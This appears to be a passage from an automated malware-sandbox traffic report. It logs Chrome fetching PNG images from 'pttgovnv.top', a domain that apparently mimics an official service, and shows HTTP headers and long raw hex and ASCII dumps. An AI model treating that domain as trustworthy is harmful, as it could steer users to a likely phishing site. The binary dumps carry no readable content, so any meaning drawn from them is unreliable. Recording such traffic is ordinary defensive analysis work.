          Data Ascii: {&3&T}.<~Q#6]Gy#^x"[ORbO=[{+K^ki!~-x~E+os{,'6quiFz_v"OtK`(.;!g!nC]@*RtL6ERk5q
          2024-09-01 22:25:25 UTC1369INData Raw: 81 26 2e a6 57 2b fc 6a 13 ee a2 66 f0 4d ee 67 34 89 fc 5e dd 3d cc bd e9 00 3c 1d e4 f1 be f9 dc 1f d7 7d fa d6 59 b7 db 6b a1 e0 cd 6b e8 21 ee ec 10 f6 2f af 97 f7 7b 7c da 1e 15 ee 23 77 be 87 01 6e 39 c8 79 08 16 e2 f6 e6 86 15 fd de 66 19 88 da 0e b1 8f 75 17 37 ae c6 6f 11 e4 da ba 9e 37 68 c0 7d e5 a2 66 60 dd 66 55 23 55 bb b9 1e e2 7c 2e 75 33 bc ca 49 83 87 28 ce bb 57 f5 fe 0d 79 c9 a2 5f eb fd db f8 bb 58 aa 55 da 77 45 46 b0 e7 6b bc ec e1 fc fb 94 0f b2 6f 73 fb 90 ff ed 6b 0f c7 ca f4 23 03 a3 39 75 bd 9b d5 59 6e 9b 74 f0 3d 2e 51 40 66 d3 ea b7 bc 81 96 ee 70 dc f4 95 8b 15 14 a6 43 59 9a 25 f6 63 83 66 55 93 59 76 23 6a 20 4a 4d a1 d0 57 70 88 11 cf ab 9e d3 cd fa c1 17 75 40 ea eb 3a 88 9b f2 a2 c5 fe 2d 72 ff 4a 05 e0 8b 6a f7 07 31
          Data Ascii: &.W+jfMg4^=<}Ykk!/{|#wn9yfu7o7h}f`fU#U|.u3I(Wy_XUwEFkosk#9uYnt=.Q@fpCY%cfUYv#j JMWpu@:-rJj1
          2024-09-01 22:25:25 UTC1369INData Raw: 67 1f af 6e 46 34 ad 3b 74 7b 30 23 7c b2 40 39 6f c2 4b d6 c2 c5 67 6b 56 79 b8 9e 31 bd fe ef 4f aa 1f 6b 3b 5e af ea 90 2f 11 ff 7c d1 77 c1 94 eb a9 ae 3a d5 c8 aa 1d 88 e3 f3 1e c5 03 c0 b6 96 3f da 73 bf 6a 46 1d 84 d2 37 e0 ad 3e f8 e4 88 d5 58 18 7e 9d 11 da ab ac 11 5d f2 78 6d 73 9a a7 92 d7 de 71 65 05 07 21 ae 70 78 1b 57 dd cc 28 df 88 c0 10 6b 2f 5e 2c bd e7 b4 5a af 99 36 82 c2 71 fd 5a 83 5b 0a 2a 3b 0c 5f ee c8 05 ba 58 f1 f8 af 5a 78 35 cd c8 d1 ac 3a b3 92 40 51 1f ea e3 a9 96 73 ff 42 dc 97 21 ac 4b 1c 2b 09 e4 3c 99 6d 26 2e 8e 1a c4 f3 16 e5 c2 4e 87 b8 0c bb 57 85 2a 38 c6 2e a3 ed d8 bb e6 d4 ec f7 36 ab ba 9b 51 fe 2a 6b 10 46 cb 01 2e cd 36 78 5d b3 5f f7 f3 64 f9 71 95 4e c4 d9 4f b1 29 dc 9e 54 9a 55 4b 07 b8 89 c3 30 18 25 43
          Data Ascii: gnF4;t{0#|@9oKgkVy1Ok;^/|w:?sjF7>X~]xmsqe!pxW(k/^,Z6qZ[*;_XZx5:@QsB!K+<m&.NW*8.6Q*kF.6x]_dqNO)TUK0%C
          2024-09-01 22:25:25 UTC1369INData Raw: 41 87 b8 ef ff 77 14 0b ce 5f d6 db f7 a5 6d 51 6f e7 f5 f6 d4 f9 87 10 b7 9d 20 77 99 85 dd a6 43 bf 63 a9 ab 59 9f fd ce 36 e8 df f7 5e 90 2b a6 cd e0 84 4f 59 03 cc 76 af f7 52 86 de fc d7 47 88 9b ef 7b 88 8b 49 c0 23 bc 55 37 5d 58 6e cf 37 1a 53 0a bd ae b7 08 73 ab 94 a9 87 74 fe 21 c4 f5 56 b0 c7 c8 d5 28 40 de 6d f8 52 31 3a 71 de e7 48 d0 0d 83 dc b1 53 78 7d 39 2f dc 8b 15 7f 7d dd 69 4b 18 ae ae ae 9f ab 42 af d3 47 39 54 b2 66 e9 59 1d 84 46 43 fa 82 73 15 97 79 f5 f8 64 f1 d1 9d e2 fd 0a 41 4e f3 33 42 5c 87 81 28 9a 28 37 ed 27 17 17 fb 65 de e0 87 1e e4 e6 6a e4 d6 0e 70 f1 14 3c 6b f1 27 a7 46 a3 0e 46 a9 90 d4 d5 4d b4 d4 8d fe 59 d7 2d 03 6b ac 68 f2 98 f1 50 4e 92 6c 22 9d 57 ed 96 3c 3c bf 67 f9 be e6 78 7d db 81 f3 0f 21 6e a7 83 dc
          Data Ascii: Aw_mQo wCcY6^+OYvRG{I#U7]Xn7Sst!V(@mR1:qHSx}9/}iKBG9TfYFCsydAN3B\((7'ejp<k'FFMY-khPNl"W<<gx}!n
          2024-09-01 22:25:25 UTC1369INData Raw: f4 d4 c4 3a cf d5 29 5e 55 ed ab f6 9b 9a b9 7f e7 93 fd 78 87 6f e6 93 bc d9 ae 12 e0 a2 90 fc 65 48 01 8e b5 75 5d b8 be c8 6b e4 8f a5 ed cf fa 7c 5b ac 38 a2 b5 eb 0e eb 47 0f ec df a4 f5 75 74 13 5e de 76 b4 af d7 a3 e6 eb 1b ec 7c dd 89 62 23 bc 65 ed db e7 8e 02 dc 87 36 01 2e 4d 3a 38 4e 9f bb e8 23 97 c7 7d 51 30 c0 5d 55 3d f5 7b e4 9e 6b 56 4d dc 4a 01 61 54 6d 56 33 17 41 70 ba ee d3 71 8b fd 8c 27 ac b3 6a b3 c9 2e bf e6 8d e7 a2 eb fd 2d f4 99 c7 f9 dd ac da b9 36 46 24 4f 86 f8 d9 d4 c4 ad 7d dc e6 d5 f6 3a 57 bf ca c9 b9 1f da bf 59 d5 6d 6d dc 83 b5 08 6d 97 8d cb 9a 9a cb aa 6c ed d2 7d 65 cd 3c 43 c0 e2 ae 9a a7 ac 19 8c 2d c2 c7 b8 ea b6 d6 35 02 c9 f1 1a 21 2e f6 f3 a2 60 30 ba 5d 5e 9d 6d 5a 2b 97 35 53 d3 0e ae 93 77 f5 be 9d ad b8
          Data Ascii: :)^UxoeHu]k|[8Gut^v|b#e6.M:8N#}Q0]U={kVMJaTmV3Apq'j.-6F$O}:WYmmml}e<C-5!.`0]^mZ+5Sw
          2024-09-01 22:25:25 UTC1012INData Raw: 7f 8d 65 e4 7a 09 99 2b d6 7a 94 3e ae 9b b8 6e b1 28 d1 0c d8 d1 f1 8a ef 39 6a e6 5e 0c 68 b7 ae 47 f7 77 7d cc 36 ac 8d 6b 3b c1 70 3c 64 fc be e6 7b 6d 3c 01 b4 10 c7 7d 85 fc f1 d2 76 24 d0 ed cd 77 5b 6a c6 f7 7f ee 63 9f c1 0e ae a3 12 37 d1 af 31 2a ba a3 fd 9b 14 08 f5 d7 4b 23 f5 55 b3 9d e1 24 f6 7b d3 79 28 d7 fd ac 51 e6 9d 77 35 ea b4 83 e3 35 aa 7e cc db b9 ad 00 dc 7a 49 af 0d 3f 73 b4 12 cc ab f6 7d 04 d7 6a da 5c 73 c2 ea c1 8c c4 15 e2 0e 2b d8 8d f2 e7 c9 ad 0b 74 5e ed c8 82 f6 be cb eb 42 6a 93 7e 1c af 8c d4 6d 75 bc db f6 49 bd 1d 1a c6 5d 06 e6 a5 fd 1b af 11 8c 62 ff 26 db 7a 98 cb 5a 90 66 df bb 0a 28 5f b2 7c 9b f7 15 42 3a 3c 5e cd b2 82 e3 aa db 41 10 cd d2 5d d7 0f fb db 08 2a 19 e4 2e aa d5 6b 9c 37 5a 35 a1 7e bf 68 f2 7f
          Data Ascii: ez+z>n(9j^hGw}6k;p<d{m<}v$w[jc71*K#U${y(Qw55~zI?s}j\s+t^Bj~muI]b&zZf(_|B:<^A]*.k7Z5~h


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          65192.168.2.449807172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC599OUTGET /help/layout/images/39.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:25 UTC728INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:25 GMT
          Content-Type: image/png
          Content-Length: 16498
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"4072-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36234
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PCx6ITRV5tdYLYugNxeU8DHNVJAgOzcXLXSxf3hXGTYRpWpvk%2Bqrtway24XdzwFBG7LIgM8jFZjo%2F%2FMiyXtcxq1Aqdc1ynRUr%2Biqwog679dlx0vDb%2BRa7mNyxYEEwxI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad15eb813320-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:25 UTC641INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 3f ff 49 44 41 54 78 da ec dd 7f 90 1c e7 5d e7 f1 47 8e 90 65 23 7b 57 b6 93 d8 4e ae 76 44 52 21 0e 90 5d 61 02 94 8b 63 47 21 c9 5d 2a 47 34 c2 a1 7c 05 14 3b 22 1c 15 7e 5c b4 ba 40 01 a9 a2 34 aa 3b 0e a8 3a 4e a3 22 bf ae 80 ec ec fd 41 91 3b 27 9a 85 e3 b8 23 04 cd 72 c1 47 2e 17 34 9b 14 31 1c 38 9a 05 13 27 c1 b1 76 1d 25 96 15 c9 7b fd 9d f9 b6 dd 9a 9d 1f fd e3 e9 ee a7 67 de af aa c9 3a da dd de 9e 9e ee 7e 3e fd fc dc b3 b3 b3 63 00 00 00 50 2c 37 71 08 00 00 00 08 71
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<?IDATx]Ge#{WNvDR!]acG!]*G4|;"~\@4;:N"A;'#rG.418'v%{g:~>cP,7qq
          2024-09-01 22:25:25 UTC1369INData Raw: 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 e3 ec 3c 32 5f f2 5e 0b 1c 09 00 00 08 71 28 90 3d 0f 6c 74 bc 2f 75 2f c8 55 38 1a 00 00 a4 58 e6 ee ec ec 70 14 60 95 17 e0 ca de 97 f3 de 6b cd 7b 2d 6b b0 c3 34 dc 50 3e b4 51 f2 be 94 72 dc 85 ce ce 43 f3 1d 47 8f 4d 79 e4 75 f3 d0 7c 8b 33 08 00 21 0e 2e 04 b9 ba f7 e5 84 fe df 75 ef d5 f0 5e 4d 2f d0 6d 71 74 26 32 bc 49 13 ba 7c e6 8b 8e ec d2 b6 f7 6a 4b a8 f3 5e 12 8e da 5e 48 6a e7 70 5c aa de 97 9a f7 9a 0b f9 2b 1b f2 f3 de be 36 1d db af 35 dd af 36 67 3b 40 88 c3 74 04 39 b9 e1 cf f7 fd f3 ba 16 aa
          Data Ascii: @!Bq8@ Bq8@ <2_^q(=lt/u/U8Xp`k{-k4P>QrCGMyu|3!.u^M/mqt&2I|jK^^Hjp\+656g;@t9
          2024-09-01 22:25:25 UTC1369INData Raw: c3 f4 95 1b b2 8f b2 fd 9a 16 da b6 9a e5 a4 16 b1 aa b5 92 c5 bd 81 f4 e6 4d 3b 65 61 53 a7 6d 37 a7 0e d9 5f 09 73 2b 96 36 b7 e6 ed 73 65 c8 df 49 72 5e c7 bd 16 a4 5b 42 4d 6a 20 47 bc ff 9d 94 fe f6 a8 6b ab db 75 42 c2 34 77 3c c0 2e 6a e2 90 b7 8a 89 bf c2 c2 bc 16 94 73 21 7e ae 15 bb e0 ef d5 fa 55 35 2c 9e 36 83 6b fe a2 f2 97 16 ab 72 0a 64 f8 d0 f0 d0 7c 43 3f 43 1b ca 0e bd 35 39 c7 65 99 b8 b6 17 d4 16 72 f8 db 8b 23 5e 67 72 da 2f 80 10 07 a4 49 6b c7 ca c6 fe 52 59 bb 0a 1a 1d 10 91 68 5f b5 3f 9e ad 30 27 b5 7a 32 f0 a1 c1 99 90 69 90 ab 59 3a df 66 1c ec 17 27 e7 54 cb c1 29 50 e4 41 8b f3 1c 20 c4 61 12 83 9c 0e 28 18 d5 ff ec ac 7e 3f c9 44 bd cb 51 fb c7 85 08 73 67 2d 1c 82 25 9d 28 98 b9 c7 b2 63 ab 5f 62 c9 c1 f7 26 41 ae ea e0 7e
          Data Ascii: M;eaSm7_s+6seIr^[BMj GkuB4w<.js!~U5,6krd|C?C59er#^gr/IkRYh_?0'z2iY:f'T)PA a(~?DQsg-%(c_b&A~
          2024-09-01 22:25:25 UTC1369INData Raw: de 4a 3a df db f9 8c 02 9c 2f d5 a9 0d a4 56 ce 7b 49 cd db 71 73 63 13 ab 14 fe 1d 1d 7d 5a ac cf aa b7 8c d8 36 67 6d 61 c8 67 c5 54 19 00 08 71 b0 1e de fc 7e 6f 17 4d 3a fd de 72 0d 71 81 e0 d3 f0 5e a5 be 30 27 83 1e a4 af 5c 11 c3 1c b3 d8 17 47 9d 5a 38 00 84 38 d8 0e 70 59 f4 7b 1b 67 51 a7 71 c8 e6 3d df 18 e6 fc a9 44 e6 34 cc 6d e9 7a ab a5 69 0b 71 59 7e 06 53 66 83 a9 35 00 10 e2 60 b3 c0 2e eb 3a a7 67 4c b2 09 7b 6d a9 66 7e 0c 7a 61 ae ec fd e7 21 ef 75 d2 f4 26 05 96 63 21 cd ac 17 bd 20 27 73 cf 2d 3b 1c e8 5a 11 7e b6 13 e2 67 16 34 d4 a3 e0 e7 36 00 8c c2 c0 86 e2 86 37 09 24 0d 93 4e b3 a9 f4 fb 69 c7 dc b6 14 74 f5 5c 8e 49 6f b4 a7 fc ed ba 06 b6 72 e0 25 21 57 56 6d d8 d4 d0 e4 4f fe db ce 7b 40 84 ce 19 27 fb 15 a6 ff 62 98 99 ef
          Data Ascii: J:/V{Iqsc}Z6gmagTq~oM:rq^0'\GZ88pY{gQq=D4mziqY~Sf5`.:gL{mf~za!u&c! 's-;Z~g467$Nit\Ior%!WVmO{@'b
          2024-09-01 22:25:25 UTC1369INData Raw: ff 08 72 e1 c9 f9 10 66 5e 38 39 5f 68 ae ce 47 c7 52 60 2f 59 de 2f 1b cb 8f 2d f2 f1 02 84 38 44 0b 47 2d d3 9b 10 36 49 f3 ea 4a 16 fd e4 74 32 e0 72 8c 20 77 81 c1 0e 63 0b 75 39 ae 27 42 fe 78 35 ab e5 d8 90 4e 88 33 f6 9b 2e b7 2c 9e 87 00 08 71 88 10 8e fc e6 d5 93 26 7e ad 9c df 4f 6e 21 ed 7d d5 02 68 2d 46 d0 a4 f9 6f 70 c1 29 e1 3b ec 1c 7b 27 75 80 0c f2 d1 b6 b4 9d ca 94 ec 17 00 42 dc d4 84 b9 ba 89 37 ad 87 6f 5e 83 5c 35 83 d0 29 37 fb a8 13 02 9f c9 6a 64 6d c1 48 28 9b 09 f1 73 ab 7a 8e 20 3f 1d 4b db 39 6a f9 3a 20 c4 01 84 38 38 10 e4 da de 4b 6a d3 64 d0 43 9c 5a 39 09 03 52 eb d5 cc a0 79 55 c2 62 d4 49 8c 33 a9 31 2c 0a 09 b5 26 5c 5f a4 55 3d de c8 f9 fa 34 f6 06 11 d8 ac 99 b6 15 e2 e6 68 52 05 08 71 48 5e 58 d4 4c b2 a9 48 64 c9
          Data Ascii: rf^89_hGR`/Y/-8DG-6IJt2r wcu9'Bx5N3.,q&~On!}h-Fop);{'uB7o^\5)7jdmH(sz ?K9j: 88KjdCZ9RyUbI31,&\_U=4hRqH^XLHd
          2024-09-01 22:25:25 UTC1369INData Raw: 73 79 62 e6 0c ce 43 39 8e 27 52 d8 7c ec b0 a4 7d e4 1a 26 9d 7e a1 84 38 80 10 87 02 d5 36 94 03 af 61 4f f7 d2 ec d9 34 ee 4c ca eb 87 bc 51 3a d3 dc 1c 6a 71 54 e3 e1 69 9f c5 df e2 5c 88 56 c3 52 c2 a5 fa 86 19 3b 7f 1d 00 42 1c dc 0d 75 7e b0 93 af f3 ae 07 3a 8c 0c ba 1d 93 ac d9 8d 19 fc d3 0b 73 d6 6a 38 2d 87 b9 c3 2c bd 05 10 e2 30 59 05 d7 42 e0 15 0c 76 eb 1a e8 5a dc f8 9d fc ec a4 70 4f 52 1b c7 ec fd c3 1f 76 e4 d8 c6 9d 3a 67 43 47 94 db de af 8a ee 53 dc 09 b7 d7 bd fd 2a f3 09 03 84 38 4c 7e 21 56 d2 50 57 d2 97 e8 18 87 d6 42 c5 f3 05 7b 3d 62 d8 70 76 4d 58 47 af 85 b2 09 3f 28 47 1e 7c 2a 69 5f 1f fa b9 fb fb 14 a6 e6 30 93 fd 02 08 71 80 db 85 9a 34 e3 cd 32 3d 87 93 61 23 cc 52 4f 5b d4 aa 26 3e d6 65 fd cf 60 df 4d b9 1e 72 1b 50
          Data Ascii: sybC9'R|}&~86aO4LQ:jqTi\VR;Bu~:sj8-,0YBvZpORv:gCGS*8L~!VPWB{=bpvMXG?(G|*i_0q42=a#RO[&>e`MrP
          2024-09-01 22:25:25 UTC1369INData Raw: 5e 81 b6 6a 92 4d 5e dc b4 b9 4f da 57 4f 9a d7 82 fd a2 fc fe 4e f2 b7 1a 2e 35 8d e9 64 c7 b2 af 12 0c 06 75 c0 ef d7 f2 5e b2 ff 6d db a3 93 35 9c 2c 9b dd 7d ca d6 cd 0b cd 8a 9d 1c 8e 4f dd d8 9d 20 3b 89 45 0d 73 72 4c 96 33 9e e2 e7 f9 40 6b 7a a3 c4 cb 7a 2f 90 cf 4a 6a b4 3b 7a 9e d7 e3 7e 4e da 44 5d 0e 9c 87 8b 7d d7 90 7f 0e d2 6f 30 9d fb c0 42 e0 3e e0 0f ca 09 db f7 78 43 ef 0d fe 67 e4 7f ed e4 d9 87 1a 96 cb 5d d6 4e cd f5 42 ad 79 5f 4e 59 d8 d4 b6 77 51 ce 3a f2 9e 66 b5 f0 88 53 33 b2 a9 ab 2c d8 d8 0f b9 e9 35 42 dc f0 a4 30 aa 7a 7f b7 99 e3 31 5b 08 14 c2 49 07 87 24 ee b7 a5 9f 61 d3 8c 9f c8 79 5b 83 4b 23 a3 e3 54 d5 00 e7 f2 e0 17 59 05 a4 96 55 98 91 a6 64 d3 ab 89 1c bb 5f b2 32 49 84 cf 3f ee 3a c9 6b 7a ee 35 62 be 9f 72 df
          Data Ascii: ^jM^OWON.5du^m5,}O ;EsrL3@kzz/Jj;z~ND]}o0B>xCg]NBy_NYwQ:fS3,5B0z1[I$ay[K#TYUd_2I?:kz5br
          2024-09-01 22:25:25 UTC1369INData Raw: 01 ce f7 be 67 0e 87 09 72 f5 9c 6b c3 f3 1c 25 d9 d1 87 d7 b3 8e 7f 94 1b 51 e7 8d d4 fb 66 6d 82 6f 71 72 9d 52 1b e7 10 d6 4e 75 80 a5 35 47 6d 86 ba 25 bd 21 6d ea 93 68 f7 c5 e8 24 a7 03 b9 8d 20 97 47 e8 ad 8d fa db b2 da 42 37 c0 15 8c 04 39 e3 05 b9 f7 dc 75 66 54 61 28 e7 ca c2 14 5e 23 6d bd ef 2d 6b b3 ae 8b cd 8e dd d1 c4 31 7e af 66 d2 1d 28 e2 af 89 eb bf fa 95 f4 b5 90 e2 7e 2c 4f 78 50 25 c4 21 f6 85 51 31 6e cd 9b d4 1f ea 36 02 81 8e 4e ae bb 03 49 9a 4b 68 f5 17 30 ed 01 37 71 ff e6 3d 5f 90 e3 25 fb 3a 74 e4 9e f4 81 fb ae 27 ab 85 3d 1f 24 c8 7d df e5 b7 8e 9a 82 44 fa a6 d5 a6 6c 42 d5 cd e0 bc 6b 32 f1 b0 63 13 e0 ca b5 55 8f 33 57 a4 d6 c2 d9 7e 10 df d6 b0 df 8c ba 24 a1 ee 4f 45 8f ad cd 9a d7 19 69 ad a1 0c 20 c4 21 40 9a 17 b4
          Data Ascii: grk%QfmoqrRNu5Gm%!mh$ GB79ufTa(^#m-k1~f(~,OxP%!Q1n6NIKh07q=_%:t'=$}DlBk2cU3W~$OEi !@
          2024-09-01 22:25:25 UTC1369INData Raw: f6 92 e9 8d 1c 9b 84 30 27 f3 cd b5 8b 3a f0 41 47 a4 d9 ba 91 6d 67 79 33 d7 29 54 56 33 3e 5e 12 78 07 76 3e eb 36 33 46 ad 85 bb 79 af f9 e3 ef 29 0d fe 9e 17 be a4 e6 cd 5c bf 94 6c 9f bd 00 b8 f3 99 7f 3d 30 c8 49 ed 9f 84 c8 a8 56 2f 7f 57 ac 90 9b a2 1a 77 57 2b c1 28 ce f5 54 cd a9 09 bb c3 a7 46 88 43 4e 37 0b 1d aa 2f a5 d7 49 7d 92 2b 32 09 41 ed 82 0e 57 b7 b9 cf 8d 1c 6e e6 59 17 de 43 9b 8a 7f e7 99 6f 89 bc b1 8f bc f6 65 83 47 a0 4a 80 8b 51 fb 36 94 34 b3 0e 09 72 dd 10 19 b1 7f 9c 8c 54 95 fe 7f 43 94 73 38 8f 99 b4 d5 8e a8 dd 14 4e 47 9d 8f d2 22 2b cd b7 53 30 f3 00 21 0e a9 86 39 69 7e 93 30 77 cc d8 9b ff 27 0f d2 bc da 72 6c ae ac 30 6c 16 b8 f5 1c ce 21 79 1a 5f cf fb 78 49 a0 89 3a 2f 9c 4c 25 22 83 0c 76 d7 2f fc a6 dd 00 d7 1f
          Data Ascii: 0':AGmgy3)TV3>^xv>63Fy)\l=0IV/WwW+(TFCN7/I}+2AWnYCoeGJQ64rTCs8NG"+S0!9i~0w'rl0l!y_xI:/L%"v/
          2024-09-01 22:25:25 UTC1369INData Raw: de 31 f3 3f c6 ff cd 7d bb 47 b9 fe df 4b 5f 8b b4 db 0f 7c c3 13 23 af a9 94 8f da 36 27 4e ea f7 75 b9 5f 9f 72 74 f7 b2 98 e0 1b 19 a0 39 35 ff 0b 5d c2 db 39 33 7a 1a 0f e9 ec 7a ca fb d9 96 ab ef 23 b0 f8 b3 ed a6 d5 92 a3 6f b9 33 61 a7 62 2e 35 05 2f 8b 58 eb b5 b5 35 20 28 cd 7e 7b a8 df fd fd 3b 57 ba 21 6d 94 87 67 fe 20 d4 84 bf 66 66 f7 b3 c5 5f 7f f5 6a 91 3e 6f 6a fa d2 bb a7 cf ea bd da a5 00 27 a1 7d cd f4 d6 74 95 59 ae 97 f9 a4 08 71 b0 f3 a4 16 65 60 c0 a2 f7 3b 0d c7 83 5c cd f2 66 5d 9d c4 d2 56 88 9b 9d 92 d3 7d e0 03 c8 bd 61 02 53 9f 0b ff d8 17 e4 64 e5 84 5b c6 57 2a 48 38 93 39 e0 64 75 86 7e 52 4b f7 e7 2f fe 4f e6 07 6e 5b 0b b7 13 77 7d ef ae 7f fa f0 53 5f 8d f4 3e be 67 ff d0 f9 ed 36 0c 0a 1b e0 f4 5c cf bb f9 d4 0f 6d 32
          Data Ascii: 1?}GK_|#6'Nu_rt95]93zz#o3ab.5/X5 (~{;W!mg ff_j>oj'}tYqe`;\f]V}aSd[W*H89du~RK/On[w}S_>g6\m2


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          66192.168.2.449809172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC599OUTGET /help/layout/images/40.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:25 UTC722INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:25 GMT
          Content-Type: image/png
          Content-Length: 10746
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"29fa-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36234
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WbpXVhUUyo3Ti6pMnr0WFuovkUmB1vqecQkIuxcvRDE9n0b2DGNNkURyrgbWatHeyP1xK7VaKS6k6yDBUy5najffxrh%2BMbigt4XYROaPKdbyChuRghnH%2BdOdgbjT0g0%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad169b131855-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:25 UTC647INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 29 87 49 44 41 54 78 da ec dd 3d 76 db 56 c2 06 60 4c ce 77 ce 94 56 56 60 a5 72 29 4d e5 d2 f4 0a ac 94 53 99 5e 81 95 15 98 5e 41 e4 15 98 ae a6 8c bc 02 53 a5 ab 48 a5 ab c8 2b 18 a9 9c ca 1f 2e 71 19 d1 b2 7e f0 73 2f 00 52 cf 73 0e e3 4c c6 12 41 10 b8 78 ef ff 3f be 7d fb 56 00 00 b0 59 7e 72 0a 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<)IDATx=vV`LwVV`r)MS^^ASH+.q~s/RsLAx?}VY~r888!!!@@@88
          2024-09-01 22:25:25 UTC1369INData Raw: 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 b6 c2 e7 27 93 f2 b5 ef 44 00 00 7d fa c7 b7 6f df 9c 85 ee 41 ee bc fc e7 bc 78 fa 65 e6 64 3c 6c ff fc cf e9 6e f9 c7 ee c0 87 71 f1 bf 7f ef 9f 8e f8 1c 85 4a cf ce 18 3f 43 79 6c e1 b8 ea 54 ca 4e cb e3 bb d8 90 f2 e9 fa 35 79 51 96 55 a7 5b 79 03 fe f8 59 8b f2 b3 2e 94 4c 08 71 dc 55 70 4c ca 7f 7e 2a 5f 5f cb d7 ac 2c 34 e6 4e ca 83 0b 6f d3 e5 77 5f 14 8f 47 76 68 67 e5 2b 54 32 c2 43 7b 51 06 8f c5 40 e7 67 27 9e 9f 70 9e 1e d5 fc b1 cb f2
          Data Ascii: 888!!!!@@@888!!!!@@@'D}oAxed<lnqJ?CylTN5yQU[yY.LqUpL~*__,4Now_Gvhg+T2C{Q@g'p
